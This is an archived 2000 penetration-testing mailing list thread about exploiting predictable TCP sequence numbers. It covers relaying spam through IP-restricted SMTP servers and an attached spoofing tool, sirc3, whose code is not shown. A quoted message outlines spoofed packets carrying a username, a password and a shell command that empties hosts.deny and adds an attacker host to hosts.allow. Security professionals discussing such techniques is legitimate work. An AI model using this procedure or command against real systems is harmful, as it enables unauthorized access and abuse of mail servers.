Penetration Testing mailing list archives

Re: [PEN-TEST] Exploiting sequence number predictability

From: Pedro Quintanilha <quinta () CERTBR COM BR>
Date: Tue, 22 Aug 2000 23:11:23 -0300

Another easy to implement exploit is to send SPAM trough a SMTP server
that doesn't permit relay only by the source IP... again, it's easy only
if the target server is Windoze, thanks for the M$ lack of vision about
TCP sequence number prediction.

As SMTP protocol is very simple, it's so simple to exploit in this way.


[]'s

Pedro Quintanilha
quinta () certbr com br



Jean-Simon Durand wrote:


sirc3 does something very close to that.

It is a very old technique (2-3 years old at least) and it is rarely used
today (I think) because the sequence numbers on most of the unix systems are
unpredictable. Most windows system are still vulnerable.

sirc was made with irc in mind but if I remember correctly, it works with
the telnet daemon. It tries to guess the sequence numbers to establish a tcp
connection with any source IP address.

I attached (uuencoded) a copy of the source code for sirc3. I played with it
a very long time ago so I'm not even sure if it needs modification to
compile. If I remember correctly, it's for Linux but it can certainly be
ported to other OS's.

Have fun!

Jean-Simon Durand
Montreal, Quebec, Canada

----- Original Message -----
From: "Dawes, Rogan" <rdawes () DELOITTE CO ZA>
To: <PEN-TEST () SECURITYFOCUS COM>
Sent: Friday, August 18, 2000 8:37 AM
Subject: [PEN-TEST] Exploiting sequence number predictability

[snip]

I imagine it is a case of:
1. determine the predictability algorithm (64k rule, or whatever)
2. Craft the packets required to execute the commands desired with the IP
address of a permitted workstation.
(packet 1 : SYN
 packet 2 : ACK xxxxx/username^M
 packet 3 : ACK xxxxy/password^M
 packet 4 : ACK xxxxz/echo > /etc/hosts.deny; echo attacker >>
/etc/hosts.allow; exit^M, or whatever)
 where xxxxx-xxxxz are determined by the ISN, the number of bytes in the
banner and login prompt, password prompt, and welcome banner/motd)


  ------------------------------------------------------------------------
                      Name: sirc3.tar.gz.uu
   sirc3.tar.gz.uu    Type: application/x-compressed
                  Encoding: quoted-printable

Current thread:

Re: [PEN-TEST] Exploiting sequence number predictability, (continued)
- Re: [PEN-TEST] Exploiting sequence number predictability Marshall Beddoe (Aug 22)
- Re: [PEN-TEST] Exploiting sequence number predictability l0rtamus prime (Aug 21)
  - [PEN-TEST] Online Security Vulnerability Services Teicher, Mark (Aug 22)
  - Re: [PEN-TEST] Exploiting sequence number predictability Ben Lull (Aug 22)
  - Re: [PEN-TEST] Exploiting sequence number predictability Hiromi Yanaoka (Aug 22)
  - Re: [PEN-TEST] Exploiting sequence number predictability Riley Hassell (Aug 22)
  - Re: [PEN-TEST] Exploiting sequence number predictability Jose Nazario (Aug 22)
- Re: [PEN-TEST] Exploiting sequence number predictability Todd, George (Aug 22)
  - Re: [PEN-TEST] Exploiting sequence number predictability Iván Arce (Aug 23)
- Re: [PEN-TEST] Exploiting sequence number predictability Jean-Simon Durand (Aug 22)
  - Re: [PEN-TEST] Exploiting sequence number predictability Pedro Quintanilha (Aug 23)
- Re: [PEN-TEST] Exploiting sequence number predictability Haroon Meer (Aug 22)